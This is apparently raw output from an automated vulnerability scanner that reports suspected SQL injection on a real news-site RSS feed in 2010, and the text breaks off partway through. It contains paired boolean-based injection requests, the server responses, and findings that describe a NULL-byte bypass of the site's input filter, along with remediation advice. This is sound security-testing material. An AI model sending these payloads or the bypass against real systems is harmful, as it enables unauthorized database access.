Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200792.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200792.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:10 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200795.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:21:23 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200795.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:23 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 11124167%20or%201%3d1--%20 and 11124167%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d1--%20/200795.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:27 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d2--%20/200795.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:27 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11517556'%20or%201%3d1--%20 and 11517556'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d1--%20/568/200902.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:44 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet11517556'%20or%201%3d2--%20/568/200902.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:44 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200906.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200906.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:41 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 31633381'%20or%201%3d1--%20 and 31633381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi31633381'%20or%201%3d1--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:10 GMT Date: Tue, 07 Dec 2010 23:21:10 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi31633381'%20or%201%3d2--%20/rss/CustomRssServlet/568/200907.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200907.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:20 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200907.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:20 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200908.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:21:39 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200908.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:21:39 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200909.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 34 Date: Tue, 07 Dec 2010 23:22:07 GMT Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200909.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:07 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:06 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200910.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:06 GMT Date: Tue, 07 Dec 2010 23:21:06 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16915327'%20or%201%3d1--%20 and 16915327'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi16915327'%20or%201%3d1--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:06 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi16915327'%20or%201%3d2--%20/rss/CustomRssServlet/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:06 GMT Date: Tue, 07 Dec 2010 23:22:06 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 18682428'%20or%201%3d1--%20 and 18682428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d1--%20/568/200911.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:13 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative 